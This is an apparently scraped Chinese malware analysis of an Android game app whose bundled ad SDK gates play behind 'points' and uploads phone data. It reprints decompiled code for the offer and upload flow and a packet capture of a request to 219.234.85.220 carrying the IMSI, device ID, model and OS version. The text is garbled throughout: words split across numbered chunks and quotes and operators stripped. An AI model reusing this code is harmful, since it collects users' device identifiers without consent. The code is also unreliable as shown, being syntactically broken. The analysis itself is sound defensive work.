1、Android恶意代码分析 申请的权限:允许安装程序、允许程序访问有关GSM网络信息、允许程序访问Wi-Fi网络状态信息、读取电话状态、允许程序获取有关当前或最近运行的任务的信息(缩略的任务状态、是否活动等)。恶意activity /代码分析 分析程序入口 protected void onCreate(Bundle paramBundle) / this.settings = getSharedPreferences(MainActivity, 0); super.onCreate(paramBundle); setVolumeControlStream(3); setTitle
2、(2131165197); getListView().setOnCreateContextMenuListener(this); this.creatingShortcut = android.intent.action.CREATE_SHORTCUT.equals(getIntent().getAction(); aeo(); /此函数中会开启 / public void aeo() this.Captain = new Captain(this); if (this.Captain.isOpen() & (!Captain.PN.isGame) AppConnect.getInstanc
3、e(a5a4c7af109259db240c3a6917409553, WAPS, this);/写入数据,获取网络状态 AppConnect.getInstance(this).setAdViewClassName(com.androidemu.gba.gba.Mym);/ OfferName= com.androidemu.gba.gba.Mym 存储到AppSettings startActivity(new Intent(this, LogOut.class); 开启 finish(); while (true) return; Captain.PN.isGame = false; k
4、lz(); /分析class LogOut extends Activity public void onCreate(Bundle paramBundle) requestWindowFeature(1); getWindow().setFlags(1024, 1024); super.onCreate(paramBundle);bujuset();/显示“积分大于0即可永久免费无广告全屏运行”等内容的窗口。如果积分大于0则开始真正的游戏,否则如果“获取积分”被点击,则联网显示应用列表并上传手机信息。 AppConnect.getInstance(this); private void bujuset() L
5、inearLayout localLinearLayout = new LinearLayout(this); localLinearLayout.setGravity(17); localLinearLayout.setOrientation(1); TextView localTextView1 = new TextView(this); TextView localTextView2 = new TextView(this); localTextView2.setId(1); localTextView1.setWidth(-2); localTextView2.setWidth(-2)
6、; localTextView1.setGravity(17); localTextView2.setGravity(17); Button localButton1 = new Button(this); Button localButton2 = new Button(this); localButton1.setHeight(90); localButton2.setHeight(90); ImageView localImageView = new ImageView(this); localImageView.setImageResource(2130837504); localTe
7、xtView1.setText(积分大于0即可永久免费无广告全屏运行); localTextView2.setText(积分加载中.); localButton1.setText(开始游戏); localButton2.setText(免费获取积分); localLinearLayout.addView(localImageView); localLinearLayout.addView(localTextView1); localLinearLayout.addView(localTextView2); localLinearLayout.addView(localButton1); loc
8、alLinearLayout.addView(localButton2); setContentView(localLinearLayout); localButton1.setOnClickListener(new View.OnClickListener()/点击开始游戏 public void onClick(View paramView) if (LogOut.this.point 0)/如果积分大于0那么进入游戏 com.trendy.pokemontk.Captain.PN.isGame = true; Intent localIntent = LogOut.this.getBas
9、eContext().getPackageManager().getLaunchIntentForPackage(LogOut.this.getBaseContext().getPackageName(); localIntent.addFlags(67108864); LogOut.this.startActivity(localIntent);/开启游戏的activity com.trendy.pokemontk.Alarmreceiver LogOut.this.finish(); while (true) return; com.trendy.pokemontk.Captain.PN.
10、isGame = false; Toast.makeText(LogOut.this.getApplicationContext(), 积分不足,请点击免费获取积分的按钮, 1).show(); ); localButton2.setOnClickListener(new View.OnClickListener()/点击获取积分 public void onClick(View paramView) AppConnect.getInstance(paramView.getContext().showOffers(paramView.getContext(); ); public void s
11、howOffers(Context paramContext) a(paramContext, b, y.e + this.H); paramContext, b,http:/app /action/ account/offerlist? private void a(Context paramContext, String paramString1, String paramString2) try Intent localIntent = new Intent(paramContext, h(paramContext);/参数二: com.androidemu.gba.gba.Mym/另:
12、public class Mym extends OffersWebView localIntent.setFlags(268435456); localIntent.putExtra(Offers_URL, paramString2); /http:/app /action/ account/offerlist?广告应用列表地址 localIntent.putExtra(USER_ID, paramString1); localIntent.putExtra(URL_PARAMS, c); localIntent.putExtra(CLIENT_PACKAGE, this.J); local
13、Intent.putExtra(offers_webview_tag, OffersWebView); paramContext.startActivity(localIntent);/启动activity com.androidemu.gba.gba.Mym显示 广告 发送手机型号 系统版本 IMSI icd 等信息到219.234.85.220 return; catch (Exception localException) while (true) localException.printStackTrace(); 分析 com.androidemu.gba.gba.Mymcom.and
14、roidemu.gba.gba.Mym的解析出现错误,但是根据开启activity的intent localIntent.putExtra(USER_ID, paramString1); localIntent.putExtra(URL_PARAMS, c); localIntent.putExtra(CLIENT_PACKAGE, this.J); localIntent.putExtra(offers_webview_tag, OffersWebView);可以推断这个部分是显示应用列表并上传手机的相关信息。如下图waps/SDKUtils包含的api以及抓包的分析也可以推断。抓包 1510
15、 249.394056000 27.18.59.151 219.234.85.220 HTTP 607 GET /action/connect/active?app_id=a5a4c7af109259db240c3a6917409553&udid=250824171159829&imsi=310260371538173&net=wifi&base=&app_version=1.3.8&sdk_version=1.7.1&device_name=GT-N7000&device_brand=samsung&y=5ab68cc24a4025769552c1aec9cc36d7&device_type=android&os_version=2.3.4&country_code=CN&language=zh&cid=5ist3abgr1f1jt30q0sff2pkd81j7gsc&act=com.trendy.pokemontk.MainActivity&channel=WAPS&device_width=1024&device_height=600&at=1355563304240 HTTP/1.1如上抓包的内容显示程序上传了手机型号 系统版本 imsi 等等信息